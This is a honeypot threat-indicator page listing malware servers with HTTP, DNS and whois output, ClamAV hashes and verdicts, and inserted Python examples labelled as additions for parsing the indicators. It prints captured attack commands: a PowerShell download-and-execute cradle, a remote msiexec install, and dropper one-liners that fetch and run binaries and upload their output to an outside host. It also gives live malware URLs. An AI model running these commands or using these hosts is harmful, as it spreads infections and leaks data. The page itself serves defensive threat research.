Ukrainian Honeypot ::002:: Threat Indicators // Beacon Servers

Random servers/malware located, and general notes.

Last Updated

Tue Aug 29 22:03:46 2023

See Also

(All are still regularly updated as of roughly the above date. I apologize for any organizational issues and the raw nature of this data; there's a lot to manage and a lot coming in while I'm still trying to analyze it manually to a certain degree while monitoring services. I also have a disorganized mess of a mind.)

https://bcable.net/analysis-ukr-prelim.html

https://bcable.net/analysis-ukr-graphs.html

https://bcable.net/analysis-ukr-indicators.html

https://bcable.net/analysis-ukr-ru_map_sessions.html

https://bcable.net/analysis-ukr-cn_map_sessions.html

https://bcable.net/analysis-ukr-miori_fail.html

https://bcable.net/analysis-ukr-botnet_perl.html

https://bcable.net/analysis-ukr-ddos_gh0st.html

https://bcable.net/analysis-ukr-indicators_2023.html

https://bcable.net/analysis-ukr-crew_001.html

https://bcable.net/analysis-ukr-inventory_attack.html

https://bcable.net/analysis-ukr-crew_002.html

Libraries

library(openssl)
## Linking to: OpenSSL 3.0.8 7 Feb 2023

ClamAV Scan Results

# ClamAV verdicts keyed by SHA-256 (CSV produced separately, see the graphs page)
clamscan_hashes <- read.csv("../graphs/clamscan_hashes.csv")
# Every captured sample under the (redacted) malware directory
malware_files <- list.files("redacted/malware", recursive=TRUE)
# SHA-256 of each file: openssl::sha256() reads a connection and returns a
# hash object, which as.character() renders as a lowercase hex string
malware_table <- sapply(malware_files, FUN=function(x){
	as.character(sha256(file(paste0("redacted/malware/", x))))
})
malware_sha256 <- data.frame(
	Hash.SHA256=as.vector(malware_table),
	File.Name=names(malware_table)
)
# Inner join on the hash: only samples that have a ClamAV verdict survive
malware_df <- merge(malware_sha256, clamscan_hashes, by="Hash.SHA256")
write.csv(malware_df, "malware_scans.csv", row.names=FALSE)

Manual Explorations

Spotted Random Warning Pages

http://warning.rt.ru/
http://blocked.crimea-com.net/

baidu.honker.info

http://baidu.honker.info:8/86.exe
http://baidu.honker.info:8/iexplore.exe
http://baidu.honker.info:8/c64.exe
GH0STCZHBKV2EWThpYV1dUFlFWTldkeBkcGxtkb1JOZHt2cHd7fHt+a2R7e3VRS1pXW1dOXAgWdk1cCG5aSVVNX1daUwhrd3UTCHtdWFhXWlxke2x1UUtaV1tXTlwIFnZtfA
hJVkwIf1FWTFdfWwiAeAhrd3UTCHFWXE1PWklcUVdWCF9RXFAIe3dpeGQoGH0STC
msiexec /i http://avip.okblcm.co:2650/abYDuh9tfbBfVYg7up.jpg /q
powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.8/Ladon.ps1'); Ladon OnlinePC"
powershell -nop -c Import-Module .\Ladon.ps1;Ladon OnlinePC
86.exe: Win.Malware.Siscos-6993581-0 FOUND
c64.exe: OK
iexplore.exe: Win.Malware.Temr-7070541-0 FOUND
b993dc56bb1fc2c463120c721e3a390e3c686a0cadb5ae8f725e8c1eb3219461  86.exe
044d234d96ba4d2c8d6b75dce9f3b778137708ed2fd39edfab8711d3431f8763  c64.exe
a5817d0e553b0246e46ac24f15820de0523c69eaa3324631cdd257a75c671be6  iexplore.exe
86.exe: Win.Dropper.Gh0stRAT-6997745-0 FOUND
c64.exe: Win.Malware.Johnnie-6858836-0 FOUND
iexplore.exe: Win.Malware.Temr-7070541-0 FOUND
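The R block under "ClamAV Scan Results" joins file hashes to ClamAV verdicts; the sha256sum output and the two clamscan listings just above are the raw form of that data, and the two listings disagree on 86.exe and c64.exe. As an added example (not code from the original page), the Python below parses those three outputs, re-keys the verdicts by SHA-256 the way the R merge does, and reports which verdicts changed between the two runs, which is how you notice signature drift across re-scans. The sample text is copied from the listings above; the function names are mine.

```python
import re

# Copied from the page: sha256sum output and the two clamscan listings for the
# three files served from baidu.honker.info:8 (constructed input for the example)
SHA256SUM_OUTPUT = """\
b993dc56bb1fc2c463120c721e3a390e3c686a0cadb5ae8f725e8c1eb3219461  86.exe
044d234d96ba4d2c8d6b75dce9f3b778137708ed2fd39edfab8711d3431f8763  c64.exe
a5817d0e553b0246e46ac24f15820de0523c69eaa3324631cdd257a75c671be6  iexplore.exe
"""

CLAMSCAN_RUN_1 = """\
86.exe: Win.Malware.Siscos-6993581-0 FOUND
c64.exe: OK
iexplore.exe: Win.Malware.Temr-7070541-0 FOUND
"""

CLAMSCAN_RUN_2 = """\
86.exe: Win.Dropper.Gh0stRAT-6997745-0 FOUND
c64.exe: Win.Malware.Johnnie-6858836-0 FOUND
iexplore.exe: Win.Malware.Temr-7070541-0 FOUND
"""

_SUM_RE = re.compile(r"^([0-9a-f]{64})\s+\*?(.+)$")
# "<path>: <signature> FOUND" or "<path>: OK"; summary lines do not match
_SCAN_RE = re.compile(r"^(.+?): (?:(.+) FOUND|OK)$")


def parse_sha256sum(text):
    """Map file name -> SHA-256 from `sha256sum` output."""
    out = {}
    for line in text.splitlines():
        m = _SUM_RE.match(line.strip())
        if m:
            out[m.group(2)] = m.group(1)
    return out


def parse_clamscan(text):
    """Map file name -> signature name, or None when clamscan said OK."""
    out = {}
    for line in text.splitlines():
        m = _SCAN_RE.match(line.strip())
        if m:
            out[m.group(1)] = m.group(2)
    return out


def by_hash(sums, scan):
    """Re-key a clamscan table by SHA-256 so it joins with any hash-keyed
    source (the same inner join the R merge() above performs)."""
    return {sums[name]: (name, verdict)
            for name, verdict in scan.items() if name in sums}


def verdict_changes(sums, run_a, run_b):
    """Hashes whose verdict differs between two scan runs (signature drift).
    Returns {sha256: (file name, verdict in run_a, verdict in run_b)}."""
    a, b = by_hash(sums, run_a), by_hash(sums, run_b)
    return {h: (a[h][0], a[h][1], b[h][1])
            for h in a.keys() & b.keys() if a[h][1] != b[h][1]}


if __name__ == "__main__":
    sums = parse_sha256sum(SHA256SUM_OUTPUT)
    changes = verdict_changes(sums, parse_clamscan(CLAMSCAN_RUN_1),
                              parse_clamscan(CLAMSCAN_RUN_2))
    for h, (name, before, after) in sorted(changes.items()):
        print(f"{h[:16]}... {name}: {before or 'OK'} -> {after or 'OK'}")
```

Keying on the hash rather than the file name matters here because the same three names (86.exe, c64.exe, iexplore.exe) are served again from 2.indexsinas.me:811 later on this page; only the hash tells you whether those are the same samples.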
baidu.honker.info.	600	IN	A	112.175.114.125
$ whois baidu.honker.info
[Querying whois.afilias.net]
[whois.afilias.net]
Malformed request.
>>> Last update of WHOIS database: 2022-03-10T06:25:39Z <<<
$ curl -i http://baidu.honker.info:8
HTTP/1.1 200 OK
Server: MyWebServer/3.6.22 Unicode (By TGY)
Date: Thu, 10 Mar 2022 04:27:54 GMT
Accept-Ranges: bytes
Last-Modified: Fri, 19 Nov 2021 18:36:36 GMT
Content-Type: text/html
Content-Length: 4
ETag: "/:Fri, 19 Nov 2021 18:36:36 GMT"
Connection: Keep-Alive

look

194.242.56.116

194.242.56.116/mirai.x86

Discord ID embedded:

Developers: EcstasyCode#8838

Is this the same guy? (did some searching):

https://genius.com/Ecstasycode-my-botnet-lyrics

My Botnet Lyrics
- prehook (famy)
Fucking best Botnet on the world (yeah, yeah)
Fuck OVH (whoah)

- hook (famy)
My Botnet is fucking best (brother)
My Botnet is fucking best
My Botnet is fucking best
My Botnet (yeah yeah)
Fuck OVH (nanananana)
Fuck OVH (nananananana)
My Botnet is [..] fucking best (nanananananana)
Fuck OVH (nanana)
Fuck OVH (nanananana)

- end (EcstasyCode)
Fuck OVH (nananana)
My Botnet is fucking best
My Botnet is fucking' fucking' fucking' fucking' fucking' best (ay)

[...]

Genius Annotation
1 contributor
Famy and his gang have the best botnet on the world they even know how to fuck your mom

[...]

Genius Annotation
1 contributor
OVH is trash and is burning down so they say fuck OVH.

[...]

Written By
Yinuzo
Release Date
May 16, 2021

23.94.7.175

http://23.94.7.175/.s4y
s4y is a hacker and fucked you mother.

136.144.41.60:3074

[ ] arm  2022-02-10 05:19  41K
[ ] arm6 2022-02-10 05:19  44K
[ ] arm7 2022-02-10 05:19  66K
[ ] m68k 2022-02-10 05:19  99K
[ ] mips 2022-02-10 05:19  43K
[ ] mpsl 2022-02-10 05:19  43K
[ ] ppc  2022-02-10 05:19  40K
[ ] sh4  2022-02-10 05:19  83K
[ ] spc  2022-02-10 05:19  99K
[ ] x86  2022-02-10 05:19  33K

141.95.55.167

$ curl -i http://141.95.55.167/a5as4d5asd5asd4as5D/
HTTP/1.1 404 Not Found
Date: Thu, 10 Mar 2022 04:14:02 GMT
Server: Apache/2.4.38 (Debian)
Content-Length: 275
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 141.95.55.167 Port 80</address>
</body></html>

178.62.220.66

$ curl -i http://178.62.220.66/k13msmfs2/
HTTP/1.1 200 OK
Date: Thu, 10 Mar 2022 04:17:04 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Fri, 11 Feb 2022 23:05:25 GMT
ETag: "0-5d7c61a22ec44"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8

23.254.247.214

$ curl -i http://23.254.247.214
HTTP/1.1 403 Forbidden
Date: Thu, 10 Mar 2022 04:21:32 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8

23.94.22.13

$ curl -i http://23.94.22.13/a/
HTTP/1.1 200 OK
Date: Thu, 10 Mar 2022 04:24:03 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Tue, 22 Feb 2022 12:42:43 GMT
ETag: "22f-5d89aaf6d4267"
Accept-Ranges: bytes
Content-Length: 559
Content-Type: text/html; charset=UTF-8

rm -rf a3; curl http://23.94.22.13/arm7 > a3; chmod 777 a3; ./a3 dlink > a; curl -XPUT 2.56.56.43:9832 -T a;

rm -rf a2; curl http://23.94.22.13/arm5 > a2; chmod 777 a2; ./a2 dlink > b; curl -XPUT 2.56.56.43:9832 -T b;

rm -rf a1; curl http://23.94.22.13/arm > a1; chmod 777 a1; ./a1 dlink > c; curl -XPUT 2.56.56.43:9832 -T c;

rm -rf a6; curl http://23.94.22.13/mips > a6; chmod 777 a6; ./a6 dlink > d; curl -XPUT 2.56.56.43:9832 -T d;

rm -rf a9; curl http://23.94.22.13/mipsel > a9; chmod 777 a9; ./a9 dlink > e; curl -XPUT 2.56.56.43:9832 -T e;
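The five lines above are the whole content of http://23.94.22.13/a/ (559 bytes). Each one is a complete stage: fetch one architecture's binary, make it executable, run it with the argument "dlink", and upload whatever it printed to a second host, 2.56.56.43:9832, with an HTTP PUT. The payload host and the reporting host are therefore different indicators. The Python below is an added example (not from the page) that splits such one-liners into their stages and pulls out the download URLs, the architectures, the bot argument and the PUT endpoint; the input is copied from the listing above, and the field names are mine.

```python
# Copied from the page: the five command lines served from http://23.94.22.13/a/
# (constructed input for this example; each line is one dropper stage)
DROPPER_LINES = """\
rm -rf a3; curl http://23.94.22.13/arm7 > a3; chmod 777 a3; ./a3 dlink > a; curl -XPUT 2.56.56.43:9832 -T a;
rm -rf a2; curl http://23.94.22.13/arm5 > a2; chmod 777 a2; ./a2 dlink > b; curl -XPUT 2.56.56.43:9832 -T b;
rm -rf a1; curl http://23.94.22.13/arm > a1; chmod 777 a1; ./a1 dlink > c; curl -XPUT 2.56.56.43:9832 -T c;
rm -rf a6; curl http://23.94.22.13/mips > a6; chmod 777 a6; ./a6 dlink > d; curl -XPUT 2.56.56.43:9832 -T d;
rm -rf a9; curl http://23.94.22.13/mipsel > a9; chmod 777 a9; ./a9 dlink > e; curl -XPUT 2.56.56.43:9832 -T e;
"""


def split_commands(line):
    """Split a one-liner on ';'. Enough for these droppers, which use no quoting."""
    return [c.strip() for c in line.split(";") if c.strip()]


def parse_stage(line):
    """One dropper line -> what it fetches, what it runs, and where it reports."""
    stage = {"download": None, "saved_as": None, "executed": None,
             "argument": None, "exfil_to": None, "exfil_file": None}
    for cmd in split_commands(line):
        argv = cmd.split()
        if argv[0] == "curl" and "-XPUT" in argv:
            # curl -XPUT host:port -T file : uploads the binary's captured stdout
            stage["exfil_to"] = argv[argv.index("-XPUT") + 1]
            stage["exfil_file"] = argv[argv.index("-T") + 1]
        elif argv[0] in ("curl", "wget"):
            stage["download"] = next((a for a in argv[1:] if "://" in a), None)
            if ">" in argv:
                stage["saved_as"] = argv[argv.index(">") + 1]
        elif argv[0].startswith("./"):
            stage["executed"] = argv[0][2:]
            if len(argv) > 1 and argv[1] != ">":
                stage["argument"] = argv[1]
    return stage


def summarize(text):
    """Indicators across all stages: payload URLs, architectures (URL basename),
    the argument the bot is started with, and distinct reporting endpoints."""
    stages = [parse_stage(l) for l in text.splitlines() if l.strip()]
    return {
        "payload_urls": [s["download"] for s in stages if s["download"]],
        "architectures": [s["download"].rsplit("/", 1)[1]
                          for s in stages if s["download"]],
        "bot_argument": sorted({s["argument"] for s in stages if s["argument"]}),
        "exfil_endpoints": sorted({s["exfil_to"] for s in stages if s["exfil_to"]}),
    }


if __name__ == "__main__":
    for k, v in summarize(DROPPER_LINES).items():
        print(f"{k}: {v}")
```

When a honeypot captures a script like this, block or watch both hosts: the payload server will rotate, but the PUT endpoint that collects the bots' output is the part the operator actually reads.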

23.95.0.211

$ curl -i http://23.95.0.211
HTTP/1.1 403 Forbidden
Date: Thu, 10 Mar 2022 04:25:17 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
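This 403 carries the same Last-Modified (Thu, 16 Oct 2014 13:20:58 GMT), ETag "1321-5058a1e728280" and Content-Length 4897 as the one from 23.254.247.214 above, and the same triple recurs on bots.infectedfam.cc, scan.infectedfam.cc, 45.90.160.54 and 107.174.137.24 further down. Apache's default FileETag is just hex(size)-hex(mtime in microseconds) (older 2.2 builds prepend hex(inode)), so the tag can be decoded offline: 0x1321 is 4897 and the second field is 2014-10-16T13:20:58Z, i.e. the untouched stock CentOS 7 httpd test page. That tells you "default install, payloads live in a subdirectory" and nothing host-specific, so the ETag is a cluster key, not an attribution. The Python below is an added example, not code from the page: it decodes Apache ETags, checks the size field against Content-Length, and groups this page's hosts by tag. The host table is transcribed from the curl responses on this page.

```python
from datetime import datetime, timezone

# Transcribed from the curl output on this page (constructed input for the
# example): host or URL -> (Server header, ETag header, Content-Length)
RESPONSES = {
    "23.254.247.214":           ("Apache/2.4.6 (CentOS) PHP/5.4.16", '"1321-5058a1e728280"', 4897),
    "23.95.0.211":              ("Apache/2.4.6 (CentOS)", '"1321-5058a1e728280"', 4897),
    "bots.infectedfam.cc":      ("Apache/2.4.6 (CentOS)", '"1321-5058a1e728280"', 4897),
    "scan.infectedfam.cc":      ("Apache/2.4.6 (CentOS)", '"1321-5058a1e728280"', 4897),
    "45.90.160.54":             ("Apache/2.4.6 (CentOS)", '"1321-5058a1e728280"', 4897),
    "107.174.137.24":           ("Apache/2.4.6 (CentOS)", '"1321-5058a1e728280"', 4897),
    "31.210.20.109":            ("Apache/2.4.6 (CentOS)", '"2-5d9e4a361fb00"', 2),
    "23.94.22.13/a/":           ("Apache/2.4.6 (CentOS)", '"22f-5d89aaf6d4267"', 559),
    "178.62.220.66/k13msmfs2/": ("Apache/2.4.6 (CentOS)", '"0-5d7c61a22ec44"', 0),
    "5.188.210.227":            ("Apache/2.2.15 (CentOS)", '"604d5-0-567f18d6c0840"', 0),
}


def decode_etag(etag):
    """Decode an Apache FileETag of the form size-mtime or inode-size-mtime
    (hex fields, mtime in microseconds since the epoch) into
    (size_bytes, mtime_epoch_seconds). Weak tags ('W/"..."') are accepted."""
    tag = etag.strip()
    if tag.startswith("W/"):
        tag = tag[2:]
    fields = tag.strip('"').split("-")
    if len(fields) not in (2, 3):
        raise ValueError(f"not an Apache size/mtime ETag: {etag!r}")
    size, mtime_us = int(fields[-2], 16), int(fields[-1], 16)
    return size, mtime_us / 1_000_000


def etag_mtime_iso(etag):
    """The file's mtime as an ISO-8601 UTC timestamp."""
    _, secs = decode_etag(etag)
    return datetime.fromtimestamp(secs, tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")


def consistent(etag, content_length):
    """Sanity check: the ETag size field must equal Content-Length, otherwise
    the tag is not an Apache size/mtime tag and should not be decoded."""
    return decode_etag(etag)[0] == content_length


def cluster_by_etag(responses):
    """Group hosts whose served file has identical size and mtime."""
    groups = {}
    for host, (_server, etag, _length) in responses.items():
        groups.setdefault(etag, []).append(host)
    return groups


if __name__ == "__main__":
    for etag, hosts in cluster_by_etag(RESPONSES).items():
        size, _ = decode_etag(etag)
        print(f"{etag} size={size} mtime={etag_mtime_iso(etag)} hosts={hosts}")
```

The same trick dates the non-default responses too: the 2-byte "X" on 31.210.20.109 was written on 2022-03-10 and the empty file on 178.62.220.66 on 2022-02-11, matching their Last-Modified headers, which is a cheap check that an operator has not tampered with the dates.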

5.188.210.227

$ curl -i http://5.188.210.227
HTTP/1.1 200 OK
Date: Thu, 10 Mar 2022 04:31:09 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Wed, 21 Mar 2018 19:54:01 GMT
ETag: "604d5-0-567f18d6c0840"
Accept-Ranges: bytes
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

185.156.72.4

$ curl -i http://185.156.72.4:47487
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 4353
Accept-Ranges: bytes
Server: HFS 2.3m
Set-Cookie: HFS_SID_=0.120227481937036; path=/; HttpOnly
Cache-Control: no-cache, no-store, must-revalidate, max-age=-1
Server information HttpFileServer 2.3m
Server time: 2/8/2022 9:07:42 AM
Server uptime: (1 days) 06:27:01

Name.extension        Size        Timestamp       Hits
[IMG] LinkOpener.exe 589.2 KB 1/24/2022 4:59:25 AM 890
inetnum:        185.156.72.0 - 185.156.72.255
netname:        Interhost
country:        NL
admin-c:        ZAM42-RIPE
tech-c:         ZAM42-RIPE
status:         ASSIGNED PA
mnt-by:         ru-ip84-1-mnt
created:        2020-09-24T02:25:57Z
last-modified:  2021-07-15T11:33:57Z
source:         RIPE
org:            ORG-VP68-RIPE

organisation:   ORG-VP68-RIPE
org-name:       TOV VAIZ PARTNER
org-type:       OTHER
address:        KIEV, ADAMA MIRKEVICHA 9 22
abuse-c:        ACRO41012-RIPE
mnt-ref:        ITDELUXE-MNT
mnt-by:         ITDELUXE-MNT
created:        2021-05-08T18:11:03Z
last-modified:  2021-05-17T07:55:40Z
source:         RIPE # Filtered

2.indexsinas.me:811

http://2.indexsinas.me:811/86.exe
http://2.indexsinas.me:811/iexplore.exe
http://2.indexsinas.me:811/c64.exe
$ curl -i http://2.indexsinas.me:811
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 3
Accept-Ranges: bytes
Server: HFS 2.3k
Set-Cookie: HFS_SID_=0.734412468969822; path=/; HttpOnly
Cache-Control: no-cache, no-store, must-revalidate, max-age=-1

123
2.indexsinas.me.	600	IN	A	211.119.107.2
2.indexsinas.me.	600	IN	A	175.206.44.100
2.indexsinas.me.	600	IN	A	223.171.55.115
$ whois 2.indexsinas.me
[Querying whois.nic.me]
[whois.nic.me]
NOT FOUND
>>> Last update of WHOIS database: 2022-03-10T06:25:40Z <<<

360.lcy2zzx.pw

http://360.lcy2zzx.pw:84/4445.exe
http://360.lcy2zzx.pw:84/testxmr50.exe
http://360.lcy2zzx.pw:84/home.exe
$ curl -i http://360.lcy2zzx.pw:84
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 14
Accept-Ranges: bytes
Server: HFS 2.3m
Set-Cookie: HFS_SID_=0.05098782107234; path=/; HttpOnly
Cache-Control: no-cache, no-store, must-revalidate, max-age=-1

www.google.com
360.lcy2zzx.pw.		600	IN	A	114.202.175.144
$ whois 360.lcy2zzx.pw
[Querying whois.nic.pw]
[whois.nic.pw]
The queried object does not exist: DOMAIN NOT FOUND

bots.infectedfam.cc

$ curl -i http://bots.infectedfam.cc
HTTP/1.1 403 Forbidden
Date: Thu, 10 Mar 2022 04:28:43 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
bots.infectedfam.cc.	61	IN	A	23.95.0.211
$ whois bots.infectedfam.cc
[Querying ccwhois.verisign-grs.com]
[ccwhois.verisign-grs.com]
No match for domain "BOTS.INFECTEDFAM.CC".
>>> Last update of WHOIS database: 2022-03-10T06:24:09Z <<<

indonesias.me

$ curl -i http://indonesias.me:9998
HTTP/1.1 403 Forbidden
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Sat, 19 Mar 2022 20:03:37 GMT
Content-Length: 1237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Prohibido: acceso denegado.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Error del servidor</h1></div>
<div id="content">
 <div class="content-container"><fieldset>
  <h2>403 - Prohibido: acceso denegado.</h2>
  <h3>No tiene permiso para ver este directorio o esta página con las credenciales que ha proporcionado.</h3>
 </fieldset></div>
</div>
</body>
</html>
(Spanish-localized IIS 7.5 error page. In English: "Server error / 403 - Forbidden: access denied. You do not have permission to view this directory or page with the credentials you supplied.")
indonesias.me.		300	IN	A	137.74.81.148
indonesias.me.		300	IN	A	39.108.155.143
indonesias.me.		300	IN	A	222.186.137.38
indonesias.me.		300	IN	A	113.200.207.107
indonesias.me.		300	IN	A	211.149.222.28
indonesias.me.		300	IN	A	120.76.245.218
$ whois indonesias.me
[Querying whois.nic.me]
[whois.nic.me]
Domain Name: INDONESIAS.ME
Registry Domain ID: D425500000049923590-AGRS
Registrar WHOIS Server:
Registrar URL:
Updated Date: 2021-07-22T22:24:19Z
Creation Date: 2018-07-22T06:56:51Z
Registry Expiry Date: 2022-07-22T06:56:51Z
Registrar Registration Expiration Date:
Registrar: NameSilo, LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Reseller:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization:
Registrant State/Province: Hubei/xiaochang/fengshan
Registrant Country: CN
Name Server: RITA.NS.CLOUDFLARE.COM
Name Server: KAI.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2022-03-10T06:20:14Z <<<

ip.ws.126.net

$ curl -i http://ip.ws.126.net
HTTP/1.1 403 Forbidden
Server: nginx
Date: Thu, 10 Mar 2022 04:29:49 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Vary: Accept-Encoding

<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx</center>
</body>
</html>
ip.ws.126.net.		2444	IN	CNAME	ipservice.163.com.
ipservice.163.com.	107	IN	A	59.111.181.52
$ whois ip.ws.126.net
[Querying whois.verisign-grs.com]
[whois.verisign-grs.com]
No match for domain "IP.WS.126.NET".
>>> Last update of whois database: 2022-03-10T06:23:50Z <<<

kevincnc.madafaka.me

kevincnc.madafaka.me.	1800	IN	A	178.62.220.66
$ whois kevincnc.madafaka.me
[Querying whois.nic.me]
[whois.nic.me]
NOT FOUND
>>> Last update of WHOIS database: 2022-03-10T06:22:24Z <<<
$ curl -i http://kevincnc.madafaka.me
HTTP/1.1 200 OK
Date: Thu, 10 Mar 2022 04:30:26 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Fri, 11 Feb 2022 23:05:25 GMT
ETag: "0-5d7c61a22f02c"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8

scan.infectedfam.cc:80

scan.infectedfam.cc.	300	IN	A	23.95.0.211
$ whois scan.infectedfam.cc
[Querying ccwhois.verisign-grs.com]
[ccwhois.verisign-grs.com]
No match for domain "SCAN.INFECTEDFAM.CC".
>>> Last update of WHOIS database: 2022-03-10T06:21:55Z <<<
$ curl -i http://scan.infectedfam.cc
HTTP/1.1 403 Forbidden
Date: Thu, 10 Mar 2022 04:31:19 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8

106.246.224.219

$ curl -i http://106.246.224.219
HTTP/1.1 200 OK
Date: Sat, 12 Mar 2022 11:07:36 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Thu, 17 Sep 2020 04:59:56 GMT
ETag: "2409b3-695-5af7b41623a17"
Accept-Ranges: bytes
Content-Length: 1685
Connection: close
Content-Type: text/html; charset=UTF-8

<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=euc-kr">
<title>(주)디즈넷</title>
<meta name="generator" content="Namo WebEditor v6.0">

</head>

<body bgcolor="white" text="black" link="blue" vlink="purple" alink="red">
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="img4.gif" border="0"></p>
<p><a href="http://www.diznet.co.kr" target="_self"><img src="img9.gif" border="0"></a></p>
<p><a href="http://ezsso.bizmeka.com"><img src="img2.gif" border="0"></a></p>
<p><a href="http://www.diznet.kr:5500"><img src="img3.gif" border="0"></a></p>
<p>&nbsp;</p>
<p align="left">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;이동할 사이트를 클릭하세요.</p>
<p align="left">&nbsp;&nbsp;&nbsp;<img src="img5.gif" border="0"></p>
</body>

</html>
(Korean landing page titled (주)디즈넷, "DizNet Co., Ltd.", linking to www.diznet.co.kr, ezsso.bizmeka.com and www.diznet.kr:5500; the caption 이동할 사이트를 클릭하세요. reads "Click the site you want to go to.")

jswl.jdaili.xyz

jswl.jdaili.xyz/jaws

$ curl -i jswl.jdaili.xyz/jaws
HTTP/1.1 404 Not Found
Date: Thu, 17 Mar 2022 20:05:51 GMT
Server: Apache/2.4.6 (CentOS)
Content-Length: 202
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /jaws was not found on this server.</p>
</body></html>
$ whois jswl.jdaili.xyz
[Querying whois.nic.xyz]
[whois.nic.xyz]
The queried object does not exist: DOMAIN NOT FOUND
$ dig jswl.jdaili.xyz
jswl.jdaili.xyz.	542	IN	A	209.141.33.141
$ whois 209.141.33.141
NetRange:       209.141.32.0 - 209.141.63.255
CIDR:           209.141.32.0/19
NetName:        PONYNET-04
NetHandle:      NET-209-141-32-0-1
Parent:         NET209 (NET-209-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       AS53667
Organization:   FranTech Solutions (SYNDI-5)
RegDate:        2011-01-27
Updated:        2012-03-25
Ref:            https://rdap.arin.net/registry/ip/209.141.32.0


